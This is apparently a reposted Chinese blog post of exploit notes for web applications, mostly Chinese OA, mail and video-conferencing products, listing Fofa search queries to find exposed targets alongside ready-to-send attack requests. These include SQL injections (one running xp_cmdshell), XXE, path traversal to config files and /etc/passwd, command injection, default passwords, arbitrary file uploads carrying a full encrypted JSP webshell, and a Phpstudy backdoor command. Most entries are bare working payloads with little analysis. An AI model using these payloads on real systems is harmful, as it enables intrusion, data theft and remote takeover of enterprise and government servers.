  • 相关文章 - 通达OA11.7后台任意文件上传- 通达OA 后台getshell 新思路- 通达 OA 11.7 组合拳 RCE 利用分析- 通达oa11.7 漏洞整理及复现

通达oa 11.8 后台getshell

  • 相关文章- 通达OA v11.8 存储型XSS 与 命令执行- 通达 OA 代码审计篇二 :11.8 后台 Getshell
  • POC | Payload | exp- z1un/TongdaOA-exp

通达OA v11.9 upsharestatus 后台SQL注入漏洞

  • POC | Payload | expPOST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1Content-Type: application/x-www-form-urlencodeduid=15&status=1&id=1;select sleep(4)

信呼

fofa: app="信呼-OA系统"

信呼 OA 存储型 XSS

  • 影响版本- 信呼 v1.9.0~1.9.1
  • 相关文章- 信呼OA存储型XSS 0day复现

用友

Fofa: app="用友-UFIDA-NC"

相关工具

  • jas502n/ncDecode - 用友nc数据库密码解密
  • kezibei/yongyou_nc_poc

相关文章

  • 用友UFIDAOA系统漏洞集合
  • 用友UFIDA OA系统 漏洞集合
  • 用友OA
  • 办公软件历史远程命令执行漏洞分析
  • 用友NC历史漏洞(含POC)

用友 UFIDA OA 信息泄露

  • POC | Payload | exp/service/~iufo/com.ufida.web.action.ActionServlet? action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=# 登录进去后再访问信息泄露的地址,就有权限上传文件了。然后返回主页直接查看发表的内容就行了。

用友 UFIDA OA 任意文件读取

  • Fofa: app="用友-UFIDA-NC"
  • POC | Payload | exp/NCFindWeb?service=IPreAlertConfigService&filename=/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml #数据库配置文件

用友 UFIDA OA SQLi

  • POC | Payload | exp/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

用友 UFIDA OA Web Service 默认后台自动登录

  • POC | Payload | exp后台:/uapws/ 自动登录,默认密码:111111(6)

用友 UFIDA OA XXE

  • POC | Payload | exp/uapws/soapFormat.ajaxmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

用友 UFIDA OA Web Service SQLi

  • POC | Payload | exp/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdlPOST包:POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1Host: **xxx.xxx.com**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1X-Forwarded-For: 8.8.8.8Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 646<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:exportCurrtypeToCrm> <string>1</string> </urn:exportCurrtypeToCrm> </SOAP-ENV:Body></SOAP-ENV:Envelope>

致远 OA A6 setextno.jsp sql注入漏洞

  • POC | Payload | exp/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23/yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1) and 1=2 union select 1,2,3,4,5,concat(0x23,user(),0x23,version(),0x23),7--

CNNVD-201610-923 && 用友 GRP-U8 SQL 注入

  • POC | Payload | exp - 用友GRP-U8 SQL注入- 用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923- 用友 GRP-U8 SQL 注入复现 外加发一个通用注入点- 用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hostcVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

用友 U8 OA test.jsp SQL注入漏洞

  • Fofa: "用友U8-OA"
  • POC | Payload | exp/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

用友 NCCloud FS文件管理SQL注入

  • Fofa: "NCCloud"
  • POC | Payload | exphttp://xxx.xxx.xxx.xxx/fs/使用 Sqlmap 对 username 参数 进行 SQL 注入

用友 NC DeleteServlet 反序列化

  • 相关文章 - 用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)

用友 NC XbrlPersistenceServlet反序列化

  • POC | Payload | exp - 用友 NC XbrlPersistenceServlet反序列化

用友 NC FileReceiveServlet反序列化

  • 相关文章- 用友nc 6.5 反序列化漏洞- 某C 1day 反序列化漏洞的武器级利用- 用友 NC 6.5反序列化漏洞复现与分析
  • POC | Payload | exp- 用友NC任意文件上传漏洞复现

用友 NC monitorservlet 反序列化

  • 相关文章 - 用友nc 反序列化回显构造思路

用友 NC ServiceDispatcherServlet 反序列化

  • 相关文章 - 用友NC反序列化 简单分析

CNVD-2022-60632 用友畅捷通T+ 文件上传

  • 相关文章 - 某通T+ 漏洞分析- CNVD-2022-60632 畅捷通任意文件上传漏洞复现- 某通T+产品漏洞风险排查及代码缺陷评估

新点

Fofa : app="新点OA"

敏感信息泄露漏洞

  • POC | Payload | exp/ExcelExport/人员列表.xls通过获取的登录名登陆后台(默认密码11111)

万户

fofa: app="万户网络-CMS"

万户ezeip 3.0任意文件下载

  • POC | Payload | exp/download.ashx?files=../web.config

ezEIP 4.0 SQL注入

  • POC | Payload | expPOST /label/ajax/hit.aspx HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedtype=0&colid=3&itemid=6&f=hits'

EzEIP 4.1.0 信息洩露漏洞

  • POC | Payload | expGET /label/member/getinfo.aspxCookie: WHIR_USERINFOR=whir_mem_member_pid=1;

红帆

Fofa : app="红帆-ioffice"

老版本 SQL注入

  • POC | Payload | expPOST /ioffice/prg/set/wss/ioCtlSet.asmx HTTP/1.1Host: **.**.**.**SOAPAction: "http://**.**.**.**/SignOut"Content-Type: text/xml; charset=utf-8<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema"><soap:Body> <SignOut xmlns="http://**.**.**.**/"> <SessionID>'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'</SessionID> </SignOut></soap:Body></soap:Envelope>

金和

Fofa : app="Jinher-OA"

金和OA C6 download.jsp 任意文件读取漏洞

  • POC | Payload | exp/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

金和OA C6 EditMain.aspx 后台文件写入漏洞

  • POC | Payload | exp/C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx/C6/JHSoft.Web.Portal/Default/cmdshell.aspx

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

  • POC | Payload | exp/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330

华天

Fofa : app="华天动力-OA8000"

workFlowService SQL注入漏洞

  • POC | Payload | expPOST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1<buffalo-call><method>getDataListForTree</method><string>select user()</string></buffalo-call>

SuiteCRM

CVE-2021-45897 SuiteCRM 远程命令执行漏洞

  • 相关文章 - CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现

邮服

Exchange

  • Exchange

亿邮电子邮件系统

fofa: body="亿邮电子邮件系统"

亿邮电子邮件系统远程命令执行

  • POC | Payload | expPOST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1Host: x.x.x.xContent-Length: 25Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36type='|cat /etc/passwd||'

Coremail

官网 : https://www.coremail.cn/

Coremail 论客邮件系统于2000年首发,是中国第一套中文邮件系统。是网易等运营商至今一直使用的邮件系统,也是政府机关、大学、金融机构、上市公司及其他大型企业(包含国有企业)广泛使用的邮件系统。

相关工具

  • dpu/coremail-address-book - Coremail邮件系统组织通讯录一键导出

版本信息

  • POC | Payload | exp/coremail/s/json?func=verify

爆破用户名

  • POC | Payload | exp/coremail/s?func=user:getLocaleUserName{"email":"zhangsan""defaultURL":"1"}

任意密码修改

  • 相关文章 - Coremail nday 任意密码修改复现

配置文件信息泄漏

  • POC | Payload | exp/mailsms/s?func=ADMIN:appState&dumpConfig=/- yuxiaoyou123/coremail-exp

CVE-2020-29133 Coremail 存储型XSS

  • POC | Payload | expcoremail/XT5/jsp/upload.jsp 上传 1.jpg.html

目录穿越泄漏后台漏洞

  • 相关文章- coremail漏洞之我见(碎碎念)
  • 描述访问过去会直接跳转到 tomcat 控制台,这里你就可以采用 coremail/coremail 弱口令尝试登陆,或者暴力破解。然后就是部署 war 包 Getshell 就 ok 了。
  • POC | Payload | exp/lunkr/cache/;/;/../../manager.html

文件上传

  • POC | Payload | exp- jimoyong/CoreMailUploadRcePOST /webinst/action.jsp HTTP/1.1Host:Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 99func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20shenye``````/coremail/justtest.jsp

Other

NVMS-1000

Fofa : app="TVT-NVMS-1000"

路径遍历漏洞

  • POC | Payload | expGET /../../../../../../../../../../../../windows/win.ini HTTP/1.1Host: **.**.**.**Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close

远秋医学技能考试系统

Fofa : 远秋医学技能考试系统

SQL注入漏洞

  • POC | Payload | exp/NewsDetailPage.aspx?key=news&id=1

汉王人脸考勤管理系统

Fofa : title="汉王人脸考勤管理系统"

万能密码

  • POC | Payload | exp用户名 user: or' or 1=1--密码 or

SQL 注入

  • POC | Payload | expPOST /Login/Check HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 26Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://xxx.xxx.xxx.xxx:10000Referer: http://xxx.xxx.xxx.xxx:10000/Login/indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASP.NET_SessionId=yr1cr5dd5c4g5tl33pu2yyepConnection: closestrName=admin&strPwd=admin

会捷通云视讯平台

相关文章

  • 会捷通云视讯平台2洞复现

登陆逻辑漏洞

  • POC | Payload | exp修改错误返回包 为正确的返回包{"token":null,"result":null}

任意文件读取

  • POC | Payload | expPOST /fileDownload?action=downloadBackupFile HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8fullPath=/etc/passwd

目录遍历

  • POC | Payload | exp/him/api/rest/V1.0/system/log/list?filePath=../

好视通视频会议系统

fofa: app="Hanming-Video-Conferencing"

任意文件下载

  • POC | Payload | exp/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

和信云桌面

fofa: body="和信下一代云桌面"

核心创天云桌面系统远程命令执行

  • POC | Payload | expPOST /Upload/upload_file.php?l=test HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGvContent-Length: 183------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/avif<?php phpinfo(); ?>------WebKitFormBoundaryfcKRltGv--

联软准入系统

联软准入系统任意文件上传

  • POC | Payload | exp - 联软准入系统任意文件上传POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath"../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

ClusterEngine

Fofa: title="TSCEV4.0"

CVE-2020-21224

  • NS-Sp4ce/Inspur

华视美达

相关文章

  • 记一次前台sql到rce代审

Centos-Web-Panel

CVE-2018-18323

CVE-2021-45467

  • 相关文章 - CVE-2021-45467: CWP CentOS Web Panel - preauth RCE - stristr() 绕过

WebPageTest

相关文章

  • The Tale of a Click leading to RCE

Oracle Access Manager

CVE-2021-35587

  • 相关文章 - CVE-2021-35587 Oracle Access Manager反序列化漏洞分析与命令回显构造

RDWA

相关工具

  • p0dalirius/RDWArecon - A python script to extract information from a Microsoft Remote Desktop Web Access (RDWA) application

Phpstudy

Phpstudy 后门 RCE

  • POC | Payload | expGET /1.php HTTP/1.1Host: example.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.9Accept-Encoding:gzip,deflateAccept-Charset:这里就是要执行的命令base64加密 c3lzdGVtKCdjYWxjLmV4ZScpOw==Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282Connection: close

PhpStudy nginx 解析漏洞

  • 描述此次漏洞是 Nginx 的解析漏洞,由于 phpstudy 中配置文件的不当,造成了 / xx.php 解析漏洞,故此将文件解析为 php 运行。
  • 相关文章- phpStudy默认配置致Nginx解析漏洞复现
  • POC | Payload | exp 需要把 php 恶意文件上传到服务器。<?php phpinfo();?>通过 /x.txt/x.php 方式访问上传的图片地址,解析 php 代码。

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

标签: 学习 安全 web安全

本文转载自: https://blog.csdn.net/sinat_35360663/article/details/127961522
版权归原作者 C-haidragon 所有, 如有侵权,请联系我们删除。

“学习笔记-B/S - Exploits”的评论:

还没有评论